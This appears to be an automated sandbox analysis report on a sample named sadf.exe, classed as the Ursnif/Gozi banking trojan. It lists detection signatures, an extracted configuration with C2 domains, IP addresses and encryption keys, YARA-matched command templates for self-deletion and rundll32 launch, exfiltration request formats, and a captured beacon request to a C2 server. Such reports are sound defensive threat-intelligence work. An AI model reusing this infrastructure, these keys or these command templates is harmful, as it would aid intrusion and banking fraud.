Edit tour

Windows Analysis Report
sadf.exe

Overview

General Information

Sample Name:	sadf.exe
Analysis ID:	717378
MD5:	76ebba129360ad5093f0fe66910eb06d
SHA1:	a0297ed108f534539bda64c7c0df0caefc18ec09
SHA256:	f8388847ebddbc0c6db43ede0ee839fa304fc4786d4a7c8285eb746a5a2ee711
Tags:	exegozi
Infos:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Snort IDS alert for network traffic

Yara detected Ursnif

Found evasive API chain (may stop execution after checking system information)

Writes or reads registry keys via WMI

Writes registry values via WMI

Found API chain indicative of debugger detection

Machine Learning detection for sample

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Contains functionality to call native functions

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Contains functionality to dynamically determine API calls

Uses Microsoft's Enhanced Cryptographic Provider

IP address seen in connection with other malware

Classification

Process Tree

System is w10x64

sadf.exe (PID: 4968 cmdline: C:\Users\user\Desktop\sadf.exe MD5: 76EBBA129360AD5093F0FE66910EB06D)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "KP46f4CSOep7BSWPpucTqe9MnoQIxAJdxmnsnKjRPh30CMVAPreV/NpSazOVd2zPdnjdZQHY+Cvofnd/xGJFkA4E5BTdR3u+QObYXv8YvHazXI/uLIcOvWbvGxuUzuuk/TH9ilTtJMycrkwpZD0LW24TKdeWfJczm/L6RbpfqZr9WWDsXDbOHANWxyDHKJGDJG2IU3p48MZfoSwM4BvR2skdnwdXWfqWwHJCoFeM8tl7yqZFBScY3HlZCEubEX2H6C4V+yqjVoHuMiRO1WZeoeH9XJqrsd/oGxvQ0Xe4ONA/9P7HUNK74Au67zOyI1/CuTM0x7bMpuIbs7Bp0V/e7Z1w85k4CI7C6M3K37IicCU=", "c2_domain": ["trackingg-protectioon.cdn1.mozilla.net", "45.8.158.104", "trackingg-protectioon.cdn1.mozilla.net", "188.127.224.114", "weiqeqwns.com", "wdeiqeqwns.com", "weiqeqwens.com", "weiqewqwns.com", "iujdhsndjfks.com"], "botnet": "200000", "server": "50", "serpent_key": "hFwQ4dANrmDZu2Iu", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.384425288.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.384425288.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.384568130.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.384568130.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.384610353.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.384610353.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000002.511485713.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000002.511485713.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.384466253.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.384466253.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.384373909.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.384373909.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000002.511376097.0000000000E19000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.384538617.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.384538617.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.384591559.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.384591559.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.384627029.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.384627029.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
Process Memory Space: sadf.exe PID: 4968	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x965:$a5: filename="%.4u.%lu" 0xc63:$a5: filename="%.4u.%lu" 0x5917:$a5: filename="%.4u.%lu" 0x5c15:$a5: filename="%.4u.%lu" 0x42d:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x53df:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x35a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x71b:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa1e:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x4e82:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x4fe3:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x530c:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x56cd:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x59d0:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa25e:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa283:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa40f:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xde9:$a9: &whoami=%s 0x5d9b:$a9: &whoami=%s 0xdd1:$a10: %u.%u_%u_%u_x%u 0x5d83:$a10: %u.%u_%u_%u_x%u
Process Memory Space: sadf.exe PID: 4968	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x894:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xb95:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x5846:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x5b47:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x42d:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x5d9:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x53df:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x558b:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x931:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xc2f:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x58e3:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x5be1:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x7c5:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xac9:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x5777:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x5a7b:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a9: Software\AppDataLow\Software\Microsoft\ 0xcfa:$a9: Software\AppDataLow\Software\Microsoft\ 0x13ea:$a9: Software\AppDataLow\Software\Microsoft\ 0x1437:$a9: Software\AppDataLow\Software\Microsoft\ 0x59a7:$a9: Software\AppDataLow\Software\Microsoft\
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.sadf.exe.8c0000.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.sadf.exe.e194a0.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Snort Signatures

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) - Source IP: 192.168.2.3 - Destination IP: 45.8.158.104

Timestamp:	192.168.2.345.8.158.10449704802033204 10/06/22-12:30:02.562975
SID:	2033204
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Malware Configuration Extractor: Ursnif {"RSA Public Key": "KP46f4CSOep7BSWPpucTqe9MnoQIxAJdxmnsnKjRPh30CMVAPreV/NpSazOVd2zPdnjdZQHY+Cvofnd/xGJFkA4E5BTdR3u+QObYXv8YvHazXI/uLIcOvWbvGxuUzuuk/TH9ilTtJMycrkwpZD0LW24TKdeWfJczm/L6RbpfqZr9WWDsXDbOHANWxyDHKJGDJG2IU3p48MZfoSwM4BvR2skdnwdXWfqWwHJCoFeM8tl7yqZFBScY3HlZCEubEX2H6C4V+yqjVoHuMiRO1WZeoeH9XJqrsd/oGxvQ0Xe4ONA/9P7HUNK74Au67zOyI1/CuTM0x7bMpuIbs7Bp0V/e7Z1w85k4CI7C6M3K37IicCU=", "c2_domain": ["trackingg-protectioon.cdn1.mozilla.net", "45.8.158.104", "trackingg-protectioon.cdn1.mozilla.net", "188.127.224.114", "weiqeqwns.com", "wdeiqeqwns.com", "weiqeqwens.com", "weiqewqwns.com", "iujdhsndjfks.com"], "botnet": "200000", "server": "50", "serpent_key": "hFwQ4dANrmDZu2Iu", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Source: C:\Users\user\Desktop\sadf.exe

Code function: 0_2_008C47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

0_2_008C47E5

Source: sadf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49704 -> 45.8.158.104:80

Source: global traffic

HTTP traffic detected: GET /uploaded/OefU6cYu_/2Bh5eSBuW1HoOJMcO7vA/d7SIWeoRQwnGkilzDpQ/6dU8XqIZtXmxeiGmmCE64H/f1Nt6sF7IrG2P/R1VRcVzY/_2BT38Jx_2Fbr7v8to_2FLq/VG0YsHE8mG/n_2F2PKN3TdKATV_2/FTdVW4ur9Omp/jrWMtuTkF90/3KGyudEpayTHCC/YXqBDl4ORyiaSJOw9sN_2/Fdabc1TmxPXNvinn/JCaxgYaDxedKHZk/u146Q0qWggdX24am_2/BCgVA4PEZ/TXr3WTRz0EG0cXZKBsrD/1oC2dl2fycp/FBzL9h.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

ASN Name: ASBAXETNRU ASBAXETNRU

Source: unknown

DNS traffic detected: query: trackingg-protectioon.cdn1.mozilla.net replaycode: Name error (3)

Source: Joe Sandbox View

IP Address: 45.8.158.104 45.8.158.104

Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.158.104

Source: sadf.exe, 00000000.00000002.511247920.00000000009FC000.00000004.00000010.00020000.00000000.sdmp

String found in binary or memory: http://45.8.1

Source: unknown

DNS traffic detected: queries for: trackingg-protectioon.cdn1.mozilla.net

Source: global traffic

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Ursnif

Source: Yara match	File source: 0.2.sadf.exe.8c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.sadf.exe.e194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.511376097.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

E-Banking Fraud

Yara detected Ursnif

Source: Yara match	File source: 0.2.sadf.exe.8c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.sadf.exe.e194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.511376097.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\sadf.exe

Code function: 0_2_008C47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

0_2_008C47E5

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000003.384425288.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.384425288.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.384568130.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.384568130.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.384610353.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.384610353.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000002.511485713.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000002.511485713.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.384466253.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.384466253.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.384373909.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.384373909.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.384538617.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.384538617.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.384591559.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.384591559.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.384627029.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.384627029.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: sadf.exe PID: 4968, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: sadf.exe PID: 4968, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown

Writes or reads registry keys via WMI

Source: C:\Users\user\Desktop\sadf.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\sadf.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\sadf.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\sadf.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Users\user\Desktop\sadf.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\sadf.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\sadf.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: sadf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

